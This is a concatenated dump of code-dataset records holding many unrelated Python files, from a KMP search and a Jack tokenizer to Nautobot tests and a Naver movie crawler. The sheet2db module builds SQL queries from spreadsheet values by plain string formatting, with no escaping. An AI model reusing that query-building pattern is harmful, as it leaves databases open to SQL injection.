'markdown.extensions.fenced_code', 'toc'])\n\n # Parse the HTML with BeautifulSoup\n soup = BeautifulSoup(html, 'html.parser')\n \n return mark_safe(str(soup))","repo_name":"Qabudhaim/Obscurus","sub_path":"Portal/Notes/templatetags/markdown_tags.py","file_name":"markdown_tags.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72184018467","text":"from lps import computeLPSArray\ndef KMPSearch(pat, text, mydict):\n\n M = len(pat)\n N = len(text)\n\n p = 0\n lps = [0]*M\n j = 0 \n \n\n computeLPSArray(pat, M, lps)\n \n i = 0\n while i < N:\n if pat[j] == text[i].lower():\n i += 1\n j += 1\n \n if j == M:\n p += 1\n j = lps[j-1]\n \n\n elif i < N and pat[j] != text[i]:\n\n if j != 0:\n j = lps[j-1]\n else:\n i += 1 \n mydict.update({pat:p})\n","repo_name":"AbhishekVerma023/Search-Engine","sub_path":"kmp.py","file_name":"kmp.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"20284444606","text":"import pymysql\nfrom apiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import client\nfrom oauth2client import file as oauth_file\nfrom oauth2client import tools\n\n\n__version__ = '1.0.0'\n__author__ = 'mingrammer'\n__license__ = 'MIT'\n\n\nclass Sheet2db(object):\n\n SCOPES = 'https://www.googleapis.com/auth/spreadsheets.readonly'\n\n def __init__(self, api_key=None, creds_path='credentials.json', token_path='token.json'):\n \"\"\"\n Args:\n api_key: Google API key which is accessible to spreadsheet API.\n Service will be built with api key if and only if this value has set.\n credentials_path: File path where Google API credentials is stored.\n token_storage_path: File path to store the credential in.\n \"\"\"\n if api_key:\n self.service = self._build_with_api_key(api_key)\n else:\n self.service = self._build_with_oauth_token(creds_path, token_path)\n self.cols = tuple()\n self.rows = list(tuple())\n\n def _build_with_api_key(self, api_key):\n service = build('sheets', 'v4', developerKey=api_key)\n return service\n\n def _build_with_oauth_token(self, credentials_path, token_storage_path):\n store = oauth_file.Storage(token_storage_path)\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets(\n credentials_path, self.SCOPES)\n creds = tools.run_flow(flow, store)\n service = build('sheets', 'v4', http=creds.authorize(Http()))\n return service\n\n def _quote(self, a_tuple):\n return tuple('\\'{}\\''.format(e) for e in a_tuple)\n\n def _back_quote(self, a_tuple):\n return tuple('`{}`'.format(e) for e in a_tuple)\n\n def fetch(self, sheet, tab, range):\n \"\"\"\n Fetch and store data from Google spreadsheet.\n\n Args:\n sheet: Sheet id to fetch from.\n tab: Tab name to fetch from.\n range: Cell range to fetch.\n Range must include a row will be used as database cols.\n\n Returns:\n None.\n \"\"\"\n range_name = u\"'{}'!{}\".format(tab, range)\n result = self.service.spreadsheets().values().get(\n spreadsheetId=sheet, range=range_name).execute()\n values = result.get('values', [])\n if len(values) > 1:\n self.cols = tuple(values[0])\n self.rows = [tuple(row) for row in values[1:]]\n\n def sync(self, host, port, user, password, db, table):\n \"\"\"\n Sync to database.\n\n Args:\n host: DB host.\n port: DB port.\n user: DB username.\n password: DB password.\n db: Target db sync to.\n table: Target table sync to.\n\n Returns:\n None.\n \"\"\"\n conn = pymysql.connect(\n host=host,\n port=port,\n user=user,\n passwd=password,\n db=db,\n charset='utf8',\n use_unicode=True)\n with conn.cursor() as cur:\n back_quoted_cols = self._back_quote(self.cols)\n for row in self.rows:\n quoted_row = self._quote(row)\n query = u'REPLACE INTO {}({}) VALUES ({})'.format(\n table,\n ','.join(back_quoted_cols),\n ','.join(quoted_row))\n cur.execute(query)\n conn.commit()\n","repo_name":"mingrammer/sheet2db","sub_path":"sheet2db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"70"}
+{"seq_id":"40430088558","text":"from libkrampouezh import libinterpol\nfrom libkrampouezh import naive_tree\nimport sys\nimport argparse\n\n\ndef main(args=sys.argv[1:]):\n out_formats=('pgf', 'geogebra', 'latex', 'gui')\n # The usual argparse recipe\n parser = argparse.ArgumentParser(description=\"A 1D interpoler with convenient output formats.\")\n parser.add_argument('-t', '--format', choices=out_formats, default=out_formats[0],\n\t\t\thelp='Output format (default: %(default)s)')\n sub = parser.add_subparsers()\n \n cubic = sub.add_parser('cubic', help='Interpolation using natural cubic splines.')\n cubic.add_argument('points', nargs='+', help='The points to interpol in the format `(x,y)`. At least 3.')\n cubic.set_defaults(interpol=libinterpol.cubic_coefs)\n \n hermite = sub.add_parser('hermite', help='Interpolation using cubic Hermite splines.')\n hermite.add_argument('points', nargs='+', help=\"The points to interpol in the format `(x,y,y')`. At least 2.\")\n hermite.set_defaults(interpol=libinterpol.hermite_coefs)\n \n args = parser.parse_args(args)\n # args.points = ('(1,2,3)', '(2,7,1)') so s[1:-1].split(',') is '1,2,3'.split(',')…\n points = tuple(tuple(float(f) for f in s[1:-1].split(',')) for s in args.points)\n if args.format == 'gui':\n libinterpol.plot_interpol(tuple(p[:2] for p in points))\n else:\n out = getattr(naive_tree.piecewise_polynomial(naive_tree.Variable(), args.interpol(points), (p[0] for p in points)).simplify(), args.format)()\n print(out)\n \nif __name__=='__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"LoicGrobol/krampouezh","sub_path":"krampouezh.py","file_name":"krampouezh.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"11206229910","text":"import csv\nimport json\n\ndef int_from_str(s):\n try:\n return int(s)\n except Exception:\n return None\n\nsites = []\nfor line in csv.reader(open('top.csv')):\n rank = int_from_str(line[0])\n if rank is not None:\n sites.append({\"rank\": rank, \"url\": \"http://\" + line[1], \"category\": line[3]})\n\nopen('top.json', 'w').write(json.dumps({\"sites\": sites}))\n\n\n","repo_name":"nate-parrott/fast-news","sub_path":"topsites/json_from_top_csv.py","file_name":"json_from_top_csv.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70870196707","text":"import os\nimport numpy\nimport matplotlib.pyplot as plt\nimport importlib.machinery\nimport types\nimport pdb\nimport pickle\nfrom scipy.interpolate import interp1d\nfrom util import get_subject_from_session,get_frame_channel,get_orientation_tuning_stepname\n \ndef print_session_steps_and_details(location):\n # create lists\n for sess in os.listdir(location):\n print(sess) \n with open(os.path.join(location,sess,'spike_and_trials.pickle'),'rb') as f:\n data = pickle.load(f)\n step_names = numpy.asarray(data['trial_records']['step_name'])\n durations = numpy.asarray(data['trial_records']['max_duration'])\n contrasts = numpy.asarray(data['trial_records']['contrast'])\n try:\n if not step_names: pdb.set_trace()\n except ValueError:\n pass\n \n for step_name in numpy.unique(step_names):\n durations_that_step = durations[step_names==step_name]\n contrasts_that_step = contrasts[step_names==step_name]\n print('\\t',step_name,':',numpy.unique(durations_that_step),'\\t\\t',numpy.unique(contrasts_that_step))\n\ndef get_event_channels_in_session(location):\n for sess in os.listdir(location):\n print(sess)\n with open(os.path.join(location,sess,'spike_and_trials.pickle'),'rb') as f:\n data = pickle.load(f)\n trial_duations = (numpy.asarray(data['trial_records']['trial_end_index'])-numpy.asarray(data['trial_records']['trial_start_index']))/30000\n durations = numpy.asarray(data['trial_records']['max_duration'])*1./60.\n ttl_events = data['trial_records']['events']['ttl_events']\n \n ttl_iter = iter(ttl_events.items())\n k,val = next(ttl_iter)\n for k in val.keys():\n print('\\tChannel:',k,'\\t',numpy.size(numpy.unique(val[k]['falling'])))\n\ndef load_spike_and_trials_for_one_session(session):\n with open(os.path.join(session,'spike_and_trials.pickle'),'rb') as f:\n data = pickle.load(f)\n pdb.set_trace()\n\nif __name__==\"__main__\":\n location = r'C:\\Users\\bsriram\\Desktop\\Data_V1Paper\\DetailsProcessedBehaved'\n print_session_steps_and_details(location)\n # for sess in os.listdir(location):\n # print(sess,get_orientation_tuning_stepname(sess))\n # load_spike_and_trials_for_one_session(location)\n \n \n \n","repo_name":"balajisriram/v1-paper-analysis","sub_path":"Util/GetStepNamesForSession.py","file_name":"GetStepNamesForSession.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"11565218413","text":"class Moon:\n\n def __init__(self, name, planet, orbital_period, mean_radius, image, description, id = None):\n self.name = name\n self.planet = planet\n self.orbital_period = orbital_period\n self.mean_radius = mean_radius\n self.image = image\n self.description = description\n self.id = id","repo_name":"WaxenOsprey/SolarSystem.DB","sub_path":"models/moon.py","file_name":"moon.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"73443878625","text":"import numpy as np\n\nprint(\"Hello World\")\n\n\ndef rot_matrix(matrix, degree):\n global rotm\n\n winkel = np.radians(degree)\n\n c, s = np.cos(winkel), np.sin(winkel)\n rotm = np.matrix([ [1,0,0],[0,c,-s],[0,s,c] ])\n\n print(rotm)\n return np.matmul(rotm, matrix)\n\ndef matrix():\n m1 = np.matrix([[1,0,0,0], [0,1,0,0], [0,0,1,0], [0,0,0,1]])\n m2 = np.matrix('1 0 0 0; 0 1 0 0; 0 0 1 0; 0 0 0 1')\n \n e2 = np.matrix('1 0; 0 1')\n e3 = np.matrix('1;1;1')\n\n print(e3)\n print(\"\\n\")\n\n rot = rot_matrix(e3, -90)\n\n print(rot)\n print(rot[2].item())\n\ndef mat_mult():\n m1 = np.matrix('3 2 1; 1 0 2')\n m2 = np.matrix('1 2; 0 1; 4 0')\n\n result = np.matmul(m1, m2)\n\n print(result)\n\nmatrix()","repo_name":"EE-modders/CEM-tool","sub_path":"src/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"70"}
+{"seq_id":"22596771221","text":"from django.urls import reverse\n\nfrom nautobot.tenancy.models import Tenant, TenantGroup\nfrom nautobot.utilities.testing import APITestCase, APIViewTestCases\n\n\nclass AppTest(APITestCase):\n def test_root(self):\n\n url = reverse(\"tenancy-api:api-root\")\n response = self.client.get(f\"{url}?format=api\", **self.header)\n\n self.assertEqual(response.status_code, 200)\n\n\nclass TenantGroupTest(APIViewTestCases.APIViewTestCase):\n model = TenantGroup\n brief_fields = [\"_depth\", \"display\", \"id\", \"name\", \"slug\", \"tenant_count\", \"url\"]\n bulk_update_data = {\n \"description\": \"New description\",\n }\n slug_source = \"name\"\n\n @classmethod\n def setUpTestData(cls):\n\n parent_tenant_groups = (\n TenantGroup.objects.create(name=\"Parent Tenant Group 1\", slug=\"parent-tenant-group-1\"),\n TenantGroup.objects.create(name=\"Parent Tenant Group 2\", slug=\"parent-tenant-group-2\"),\n )\n\n TenantGroup.objects.create(name=\"Tenant Group 1\", slug=\"tenant-group-1\", parent=parent_tenant_groups[0])\n TenantGroup.objects.create(name=\"Tenant Group 2\", slug=\"tenant-group-2\", parent=parent_tenant_groups[0])\n TenantGroup.objects.create(name=\"Tenant Group 3\", slug=\"tenant-group-3\", parent=parent_tenant_groups[0])\n\n cls.create_data = [\n {\n \"name\": \"Tenant Group 4\",\n \"slug\": \"tenant-group-4\",\n \"parent\": parent_tenant_groups[1].pk,\n },\n {\n \"name\": \"Tenant Group 5\",\n \"slug\": \"tenant-group-5\",\n \"parent\": parent_tenant_groups[1].pk,\n },\n {\n \"name\": \"Tenant Group 6\",\n \"slug\": \"tenant-group-6\",\n \"parent\": parent_tenant_groups[1].pk,\n },\n {\n \"name\": \"Tenant Group 7\",\n \"parent\": parent_tenant_groups[1].pk,\n },\n ]\n\n\nclass TenantTest(APIViewTestCases.APIViewTestCase):\n model = Tenant\n brief_fields = [\"display\", \"id\", \"name\", \"slug\", \"url\"]\n bulk_update_data = {\n \"description\": \"New description\",\n }\n slug_source = \"name\"\n\n @classmethod\n def setUpTestData(cls):\n\n tenant_groups = (\n TenantGroup.objects.create(name=\"Tenant Group 1\", slug=\"tenant-group-1\"),\n TenantGroup.objects.create(name=\"Tenant Group 2\", slug=\"tenant-group-2\"),\n )\n\n Tenant.objects.create(name=\"Tenant 1\", slug=\"tenant-1\", group=tenant_groups[0])\n Tenant.objects.create(name=\"Tenant 2\", slug=\"tenant-2\", group=tenant_groups[0])\n Tenant.objects.create(name=\"Tenant 3\", slug=\"tenant-3\", group=tenant_groups[0])\n\n cls.create_data = [\n {\n \"name\": \"Tenant 4\",\n \"slug\": \"tenant-4\",\n \"group\": tenant_groups[1].pk,\n },\n {\n \"name\": \"Tenant 5\",\n \"slug\": \"tenant-5\",\n \"group\": tenant_groups[1].pk,\n },\n {\n \"name\": \"Tenant 6\",\n \"slug\": \"tenant-6\",\n \"group\": tenant_groups[1].pk,\n },\n {\n \"name\": \"Tenant 7\",\n \"group\": tenant_groups[1].pk,\n },\n ]\n","repo_name":"uthapa82/nautobot-plugin-ixia","sub_path":"nautobot/tenancy/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"40007373890","text":"import bpy\nimport os, sys\n\nfrom Sun_Power.utils import *\n\n\ndef test_calc_power_lost():\n S = 120\n S_house = 120\n S_floor = 55\n radius = 4\n temp_in_start = 20\n temp_out = -15\n dT = 35\n Kt = 0.04\n N_lost_el = calc_power_lost_heat_el(S, dT, Kt)\n \n N_lost = get_power_lost(S_house, S_floor, radius, temp_in_start, temp_out)\n print(N_lost_el)\n print(N_lost)\n \n \ntest_calc_power_lost()\n","repo_name":"yaricp/Sun_Power","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"23258882441","text":"from classifier import single_predictor\nfrom utils import load_data, get_inputs, get_results, NMS, squarify, drawOutputs\nimport time\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\ndims = [\n 343, #topX\n 106, #topY\n 247, #width\n 146 #height\n]\n\nmodel = single_predictor(\"lenet_background_aug\")\n\nimage = cv2.imread(\"c:\\\\Users\\\\AaronPeng\\\\desktop\\\\prsef\\\\sliding_window\\\\imgs\\\\road.png\",0)\n\nchunk = image[dims[1]:dims[1]+dims[3],dims[0]:dims[0]+dims[2]]\n\nplt.imshow(chunk,cmap='gray')\nplt.show()\n\ntestImg = np.expand_dims(cv2.resize(chunk,(32,32)),0)/255\n\nprint(testImg.shape)\n\nprint(model.predictor.predict([testImg]))","repo_name":"Peng-AP/prsef","sub_path":"sliding_window/modelTest.py","file_name":"modelTest.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"611250653","text":"import numpy as np\nN = 1000 #number of users\nM = 200 #number of observations (sequence length)\nK = 80 #number of active users\nJ = 1 #number of antennas\nL = 100000 #number of monte carlo averaging \nepsilon = K/N #activity ratio \nomega = N/M #overload ratio\nitermax = 20 #number of iterations for MMV-AMP\nSNR = 10 #SNR\n\nsig2 = 1.0/M * 1.0/np.power(10.0,SNR/10.0) #noise variance\ntau2 = sig2 + omega * epsilon\n\nfor t in range(itermax): #iteration count\n x = np.sqrt(0.5)*np.sqrt(tau2)*(np.random.normal(size=(L,1)) + np.random.normal(size=(L,1)) * 1j)\n Km = (int)(L/N * K)\n x[0:Km] += np.sqrt(0.5)*(np.random.normal(size=(Km,1)) + np.random.normal(size=(Km,1)) * 1j) \n\n psi=np.log(1.0 + 1.0/tau2)\n pit= 1/J * (1.0/tau2 - 1.0/(1.0+tau2)) * np.power(np.abs(x),2)\n phi = 1.0/(1.0 + (1.0-epsilon)/epsilon * np.exp(-1 * (pit - psi)))\n tmp = phi * (1-phi) * 1/np.power(1+tau2,2) * np.power(np.abs(x),2)\n theta = tmp.mean() * 1/J\n tau2 = sig2 + omega*epsilon*tau2/(1+tau2) + omega*theta\n print(t, tau2)\n\n\n ","repo_name":"54isb/GFNOMA-Tutorial","sub_path":"SE.py","file_name":"SE.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"20698408705","text":"# def counter(string): #сложность О(n ** 2)\n# for symvol in string:\n# counter = 0\n# for sub_symvol in string:\n# if symvol == sub_symvol:\n# counter += 1\n# print(symvol, counter)\n\n# counter('')\n\n\n# def counter(string): #сложность О(n * m)\n# for symvol in set(string):\n# counter = 0\n# for sub_symvol in string:\n# if symvol == sub_symvol:\n# counter += 1\n# print(symvol, counter)\n\n# counter('312424')\n\ndef counter(string):\n syms_counter = {}\n for symvol in string:\n syms_counter[symvol] = syms_counter.get(symvol, 0) + 1\n print(syms_counter)\n\ncounter('azazazxasa')","repo_name":"NinjigSV/programming_4_modul","sub_path":"lesson_1.py","file_name":"lesson_1.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3188614972","text":"import json\nimport datetime as DT\nimport matplotlib.pyplot as plt\nimport ytbscrapper\n\nchannel_id = 'UCgtAOyEQdAyjvm9ATCi_Aig'\n\nvideo_path, info_path = ytbscrapper.get_info(channel_id)\n\nwith open(info_path, 'r') as file:\n info = json.load(file)\n\ndeltas = []\nviews = []\nnow = DT.datetime.now()\n\nfor index, key in enumerate(info):\n date = DT.datetime.strptime(info[key]['date'], \"%Y-%m-%dT%H:%M:%SZ\")\n delta = now - date\n additive = delta.seconds / 3600 / 24\n days = delta.days + int(additive + (0.5 if additive > 0 else -0.5))\n view = info[key]['view']\n deltas.append(days)\n views.append(view)\n\nplt.plot(deltas, views, color='red')\nplt.show()\n","repo_name":"Maxersh/WebScrappingYoutube","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4211495547","text":"import base64\n\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom pydantic import BaseModel\nfrom controller.inference import Inference\n\n\nrouter = APIRouter(\n prefix=\"/flowers\",\n responses={404: {\"description\": \"Not found\"}},\n)\n\n\ninferrer = Inference.load_dense_net('resources/plants_classification_cnn_dense_100_epochs.pt',\n 'resources/cat_to_name.json'\n )\n\n\nclass Item(BaseModel):\n image: str\n\n\n@router.post(\"/classify/\")\nasync def classify_item(item: Item):\n try:\n pred, score = inferrer.classify(base64.b64decode(item.image))\n return {\n \"classification\": pred,\n \"confidence\": score\n }\n except ValueError:\n raise HTTPException(\n status_code=422, detail=\"Invalid Format\"\n )\n","repo_name":"afakhry01/flowers-identification","sub_path":"app/server/main/router/flowers.py","file_name":"flowers.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15483991584","text":"import re\n\nSymbols = \"{|}|\\(|\\)|\\[|\\]|\\.|,|;|\\+|-|\\*|/|&|\\||<|>|=|~\"\n\nKeywords = ['class', 'method', 'function', 'constructor', \n 'int', 'boolean', 'char', 'void', \n 'var', 'static', 'field', 'let', \n 'do', 'if', 'else', 'while', \n 'return', 'true', 'false', 'null', \n 'this']\n\nToken_type = { \n 'KEYWORD' : 0,\n 'SYMBOL' : 1, \n 'IDENTIFIER' : 2, \n 'INT_CONST' : 3, \n 'STRING_CONST' : 4\n }\n\nSymbol_List = ['{', \"}\", '(', ')', \n '[', ']', '.', ',', ';',\n '+', '-', '/', '&', '|', \n '<', '>', '=', '~'\n ]\n\nop = ['+', '-', '*', '/', '&', \n '|', '<', '>', '=' ]\n\nclass JackTokenizer(object):\n '''\n Tokenizer that releases tokens to be compiled by the Compilation Engine\n '''\n \n def __init__(self, file_name):\n '''\n Constructor\n '''\n self._file_name = file_name\n self._file_object = open(file_name)\n self._lines = []\n self._tokens = []\n self._current_token = None\n self._current_token_index = 0\n self._len_tokens = 0\n\n def split(self, line):\n '''\n Splits input code by space and symbols. Returns a list.\n '''\n tokens = []\n space_septd = line.split() #Split on space\n for s_token in space_septd:\n tokens += re.split('(' + Symbols + ')', s_token) #Split on Jack Symbols\n return [s for s in tokens if s != '']\n \n def removeNoise(self):\n '''\n Removes white space and comments\n '''\n comment = False\n for line in self._file_object.readlines():\n line = line.strip()\n if len(line) == 0:\n continue \n elif line[0:3] == '/**' or line[0:2] == '/*': #Multiline comments\n comment = True\n continue\n elif line[0] == '*':\n continue\n elif line[0] == '*' and line[-2:] == '*/' and comment == True:\n comment = False\n continue\n elif line[-2:] == '*/' and comment == True:\n comment = False\n continue\n elif line.find('//') != -1: #Single line comments\n if len(line[:line.find('//')]) == 0:\n continue\n self._lines.append(line[:line.find('//')])\n else:\n self._lines.append(line)\n \n \n def print_tokens(self):\n '''\n Useful if we want to view the tokens.\n '''\n for idx in range(self._len_tokens):\n print (self._tokens[idx])\n \n def prepare_tokens(self):\n '''\n Prepares tokens for compilation engine. Takes care to tokens which should be treated\n as a String Constant.\n '''\n for line in self._lines:\n x = line.split('\"')\n if len(x) ==1:\n self._tokens += self.split(x[0]) # No String Constant Present\n else:\n for i in range(len(x)):\n if i%2==0:\n self._tokens += self.split(x[i])\n else:\n self._tokens = self._tokens + ['\"' + x[i] + '\"']\n \n self._len_tokens = len(self._tokens)\n return self._tokens\n \n def next_token(self,prev = False):\n '''\n Get the next token. prev is set when unary operators are used. \n '''\n if prev:\n self._current_token_index-=2 # Go back a token. 
(Based on my logic in CompilationEngine)\n if self._current_token_index < self._len_tokens:\n token = self._tokens[self._current_token_index]\n self._current_token = token\n self._current_token_index += 1\n return token\n else:\n return 'NO_MORE_TOKENS'\n \n def expected_token(self):\n \"\"\"\n Needed for subroutines and arrays when we want to look ahead.\n \"\"\"\n if self._current_token_index < self._len_tokens:\n return self._tokens[self._current_token_index]\n else:\n return 'NO_MORE_TOKENS'\n \n def token_type(self):\n '''\n Returns the type of token.\n '''\n if self._current_token in Symbol_List:\n return 'SYMBOL'\n elif self._current_token in Keywords:\n return 'KEYWORD'\n elif self._current_token.isdigit():\n return 'INT_CONST'\n elif self._current_token.find('\"') != -1 or self._current_token[0] == '-':\n return 'STRING_CONST'\n else:\n return 'IDENTIFIER'\n \n def identifier(self):\n return self._current_token\n \n def symbols(self):\n return self._current_token\n \n def intval(self):\n return self._current_token\n \n def stringval(self):\n return self._current_token\n \n def keyword(self):\n return self._current_token","repo_name":"KiranBaktha/Nand2Tetris","sub_path":"Nand2Tetris-master/Project 10/JackTokenizer.py","file_name":"JackTokenizer.py","file_ext":"py","file_size_in_byte":5060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35413550676","text":"from collections import deque\n\n\nt = int(input())\nfor i in range(t):\n p_list = input()\n len_p = len(p_list)\n n = int(input()) # len_n\n LIST = input()[1:-1].split(',')\n n_list = deque(x\n for x in LIST) if n != 0 else deque()\n i = 0\n start = 0\n while i < len_p:\n if p_list[i] == 'R':\n if start == 0:\n start = 1\n else:\n start = 0\n elif p_list[i] == 'D':\n if n == 0:\n print(\"error\")\n break\n if start == 0:\n n_list.popleft()\n else:\n n_list.pop()\n n -= 1\n i += 1\n else:\n if start == 1:\n n_list.reverse()\n print(\"[\", end='')\n print(\",\".join(n_list), end='')\n print(\"]\")\n","repo_name":"nimod7890/Problem-Solving","sub_path":"Gold/Gold 5/5430 AC.py","file_name":"5430 AC.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"28702826434","text":"# 양방향 연결 리스트 노드 삽입 (insertBefore() 구현)\nclass Node:\n\n def __init__(self, item):\n self.data = item\n self.prev = None\n self.next = None\n\n\nclass DoublyLinkedList:\n\n def __init__(self):\n self.nodeCount = 0\n self.head = Node(None)\n self.tail = Node(None)\n self.head.prev = None\n self.head.next = self.tail\n self.tail.prev = self.head\n self.tail.next = None\n\n\n def traverse(self):\n result = []\n curr = self.head\n while curr.next.next:\n curr = curr.next\n result.append(curr.data)\n return result\n\n\n def insertBefore(self, next, newNode):\n prev = next.prev\n prev.next = newNode\n next.prev = newNode\n newNode.prev = prev\n newNode.next = next\n self.nodeCount += 1\n return True\n\n\ndef solution(x):\n return 0\n","repo_name":"hanna56/Algorithm-lecture","sub_path":"lab10-2.py","file_name":"lab10-2.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"22574737506","text":"from selenium.webdriver.common.by import By\n\ndef crawl_movie_person(conn, cur, url, driver):\n \"\"\"한 영화에 대하여 '상세정보'에 들어가서 인물정보를 저장한다\"\"\"\n \n m_id = int(url.split('=')[-1])\n print(f'mid : {m_id}')\n driver.get(f'https://movie.naver.com/movie/bi/mi/detail.naver?code={m_id}')\n \n #더보기 버튼 활성화\n try:\n driver.find_element(By.ID, 'actorMore').click() \n except:\n pass\n\n \"\"\"\n 배우\n \"\"\"\n person_list = driver.find_elements(By.CLASS_NAME, 'p_info')\n sql_list = []\n for person in person_list:\n try:\n p_id = person.find_element(By.XPATH, 'a').get_attribute('href').split('code=')[1] \n except:\n p_id = -1 #pid 없는 경우\n try:\n # 주연 / 조연 등\n role = person.find_element(By.CLASS_NAME, 'p_part').text\n except:\n role = ''\n try:\n # ~~ 역\n character = person.find_element(By.CLASS_NAME, 'pe_cmt').find_element(By.XPATH,'span').text.replace('역','').strip()\n except:\n character =''\n sql_list.append((m_id, p_id, role, character))\n # print(f'mid:{m_id}\\npid:{p_id}\\nrole:{role}\\ncharacter:{character}\\n===========================')\n\n \"\"\"\n 단역 및 특별출연\n \"\"\"\n try:\n person_span_list_row = driver.find_element(By.ID, 'subActorList').find_elements(By.XPATH,'tbody/tr')\n except:\n person_span_list_row = []\n \n for row in person_span_list_row:\n try: \n role = row.find_element(By.XPATH,'th/img').get_attribute('alt') #단역, 특별출연 등\n except:\n role = ''\n person_list = row.find_elements(By.XPATH,'td/span')\n for person in person_list:\n try:\n p_id = person.find_element(By.XPATH,'a').get_attribute('href').split('code=')[1]\n except:\n p_id = -1\n try:\n character = person.find_element(By.XPATH,'em').text\n except:\n character = ''\n sql_list.append((m_id, p_id, role, character))\n # print(f'mid:{m_id}\\npid:{p_id}\\nrole:{role}\\ncharacter:{character}\\n===========================')\n \"\"\"\n 감독 \n \"\"\"\n try:\n director_list = driver.find_elements(By.CLASS_NAME,'dir_product')\n except:\n director_list = []\n for director in director_list:\n try:\n p_id = director.find_element(By.XPATH, 'a').get_attribute('href').split('code=')[1]\n except:\n p_id =-1\n role = '감독'\n character = ''\n sql_list.append((m_id, p_id, role, character))\n # print(f'mid:{m_id}\\npid:{p_id}\\nrole:{role}\\ncharacter:{character}\\n===========================')\n\n insert_sql = \"\"\"\n insert ignore into movie_person(m_id, p_id, role, character_)\n values(%s,%s,%s,%s); \"\"\"\n cur.executemany(insert_sql, sql_list)\n conn.commit()\n\n\n ","repo_name":"choieastsea/ds_naver_movie","sub_path":"crawl_movie_person.py","file_name":"crawl_movie_person.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9000249612","text":"# -*- coding: utf-8 -*-\n\n###################################################\n# LOCAL import\n###################################################\nfrom Plugins.Extensions.IPTVPlayer.dToolsSet.iptvtools import printDBG, printExc, DownloadFile, eConnectCallback\n###################################################\n# FOREIGN import\n###################################################\nfrom enigma import eConsoleAppContainer\nfrom Tools.Directories import resolveFilename, fileExists, SCOPE_PLUGINS\nfrom Components.config import config, configfile\nfrom Components.Language import language\nimport gettext\nimport os, sys\nimport threading\nimport time\n###################################################\n\n###################################################\n# Globals\n###################################################\ngInitIPTVPlayer = True # is initialization of IPTVPlayer is needed\nPluginLanguageDomain = \"IPTVPlayer\"\nPluginLanguagePath = \"Extensions/IPTVPlayer/locale\"\ngSetIPTVPlayerLastHostError = \"\"\ngIPTVPlayerNotificationList = None\n\n###################################################\ndef localeInit():\n lang = language.getLanguage()[:2] # getLanguage returns e.g. \"fi_FI\" for \"language_country\"\n os.environ[\"LANGUAGE\"] = lang # Enigma doesn't set this (or LC_ALL, LC_MESSAGES, LANG). gettext needs it!\n printDBG(PluginLanguageDomain + \" set language to \" + lang)\n gettext.bindtextdomain(PluginLanguageDomain, resolveFilename(SCOPE_PLUGINS, PluginLanguagePath))\n\ndef TranslateTXT(txt):\n t = gettext.dgettext(PluginLanguageDomain, txt)\n if t == txt:\n t = gettext.gettext(txt)\n return t\n\nlocaleInit()\nlanguage.addCallback(localeInit)\n\ndef IPTVPlayerNeedInit(value=None):\n global gInitIPTVPlayer\n if value in [True, False]: gInitIPTVPlayer = value\n return gInitIPTVPlayer\n \ndef SetIPTVPlayerLastHostError(value=\"\"):\n global gSetIPTVPlayerLastHostError\n gSetIPTVPlayerLastHostError = value\n\ndef GetIPTVPlayerLastHostError(clear=True):\n global gSetIPTVPlayerLastHostError\n tmp = gSetIPTVPlayerLastHostError\n if clear: gSetIPTVPlayerLastHostError = \"\"\n return tmp\n\nclass IPTVPlayerNotification():\n def __init__(self, title, message, type, timeout):\n self.title = str(title)\n self.message = str(message)\n self.type = str(type) # \"info\", \"error\", \"warning\"\n self.timeout = int(timeout)\n \n def __eq__(self, a):\n return not self.__ne__(a)\n \n def 